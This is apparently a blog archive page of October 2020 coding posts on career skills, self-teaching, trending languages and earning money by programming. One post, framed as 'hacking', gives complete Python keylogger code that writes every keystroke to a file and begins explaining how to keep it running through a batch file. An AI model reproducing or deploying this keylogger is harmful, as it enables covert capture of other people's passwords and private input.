
Showing posts from October, 2020

5 Skills That Would Level Up your Coding Career

  5 Skills That Would Level Up your Coding Career             Coding is undoubtedly a great skill to master . Sometimes it could be impossible , as the technology is changing everyday . To sustain the position learning a new skill could help a lot . Below are few skills that could help you in your project or getting a job and to stand out .             Few things could be done better by an expert but still knowing these could help in any time . 5 . 3D Modelling :             The ability to create 3D models could come in handy when you wanted to create 3D games , placeholders , VR , animations and lots more . 3D modelling is an in-demand skillset and you may have the need for someone time to time . If you can create one , it could help you a lots of money and time .             One can start with Blender , as it is a powerful open source free software with a huge community support and number of tutorials . 4 . Copywriting :             Copywriting is the process of writing persuasive m
  SELF TAUGHT VS SCHOOL EDUCATION DISCLAIMER : It was completely my perspective of viewing Education SELF TAUGHT : What is Self - Learning ?             Self - learning is something you learn completely with your own will and interest.             If you learning something from internet just because your parents wanted you to learn without you being completely passionate about it will steal all the benefits of being a Self - Taught . HUGE DECISION :             In the world where people are taking the safer side , only few come out of the circle and they are the ones who bloom.                                   Self-learning doesn't necessarily need to be learning Coding,Designing,Marketting and so and so.             Self - learning is in all parts of the life , for eg : No one taught us how to walk , we saw our parents walk so we wanted to try on our own will we fell down ,got back up and finally stood up . There were no classes to teach them. Similarly if you have a passion to

Fastest Growing Programming Languages of 2020

Fastest Growing Programming Languages of 2020             Programming Languages , new frameworks and libraries are created each and every day but few languages suddenly start to bloom time to time . And to stand out in the crowd it would be really helpful to jump into the trend earlier rather later . The list is based on the increasing interest and the potential of the Programming Languages recently . 5 . Kotlin :                Kotlin is an open source language which is similar to JAVA but has special features against bugs . It was started in 2010 and officialy released in February 2016 .  Kotlin is more concise and estimates approximately a 40% cut in the number of lines of code . Majorly used to develop Android Applications . Kotlin grew by 182% in 2018 - 2019 . 4 . TypeScript :             TypeScript is an open source language developed by Microsoft as a superset of JavaScript , released to public in October 2012 .  It is also supported out of the box by Microsoft's free c

Hacking With Python in Just 10 lines of Code | Key Logger

Hacking With Python in Just 10 lines of Code - A Key Logger             A KeyLogger logs every stroke of the keyboard into a seperate file . This is a basic keylogger which we can run on a computer we need to log the strokes .  The 2 main Packages needed are : Python Pynput And that is all we needed .  Once you have them installed copy and paste the following code : from pynput.keyboard import Key , Listener keys=[] def on_press(key): keys.append(key) d=open("C:/Users/DELL/Desktop/logofmaniacs.txt","w") d.write(str(keys)) d.close() with Listener(on_press) as listner: listner.join() Save the file in .py extension and Run the Code pressing F5 . The code starts executing and once you start typing a new text file logofmaniacs.txt is created and has all keystrokes logged .  But once the execution is stopped the keylogging also stops . To make it run continuously we create a batch file . Create a batch file with - P

5 Ways to Make Money Coding

5 Ways to Make Money Coding             You can ofcouse get a Job and make money Coding . But what if you couldn't get a Job or you don't want to get a Job . There are ways you can still earn money at your comfort . Lets see the Top 5 ways you can fill your pockets doing your passion .  5 . Freelancing :             Yes , it is the most Obvious way to make cash with Coding . You don't have to be a pro to sell your service , there could be people who needed small scripts for their projects or an hour of mentoring . Getting the first few orders will be the most difficult job . But after that everything will get in flow .  4 . Bug Bounty :             This is a way where developers can receive recognition and compensation for reporting bugs , especially reagarding security exploits . To maintain their reputation huge companies pay the person who found the bug as a reward . This way of making money mostly stays as a secret as ethical hackers don't want it to become compet

Top 5 Programming Languages to Learn

Top 5 Programming Languages to Learn                        To Start with a Disclaimer , There is no Best or Worst Language . Each one is unique in its own way . This is only a comparision to help in choosing a language to learn . Basis on which the following List is made :  Trends of the language Companies that are used Available Support , Frameworks and Libraries What can be done with them Job opportunities Learning curve Lets Start on the list from 5 to 1 : 5 . DART :             DART is a programming language initially internally used at Google.It was there since 2011 but only gained attention after the announcement of Flutter beta for cross-platform(both android and IOS) mobile app development. It is simple,modern and highly efficient as apps can be developed with a single code base . Companies Using DART: Google Alibaba Wrike Pick & School 4 . GO Lang :                          Go, also known as Golang was developed at Google in 2007. Golang is fast and easy to learn and

How to Get Started with Coding | Best Way | 2020

 There are 5 Basic Steps to get Started with Coding . 1. Know Why You wanted To Learn Coding   For Money ? Want to be a Hacker ? Feel cool being a Techie ? Passion ? To Get a Job ? Want to create your own apps ? What's your Reason ? Anything may be the reason . But ultimately you need to love it . Because it is a long hard way . You can't master it in a week or month . It needs years of practice and No one has excelled it still .  2. Learn Programming than jumping into a Language                 Ok , You love coding . What's next ? Choosing a Programming Language ? A Big NO ! I had seen people asking me , "What is the best Programming Language to get Started if I am a Complete Beginner ? "  My Answer is " LEARN WHAT IS PROGRAMMING FIRST " . People see crazy hacking movies and Techies and assume that is programming .  What is Programming ?             Programming is a way to " instruct the computer to perform various Tasks "  What is a Programmi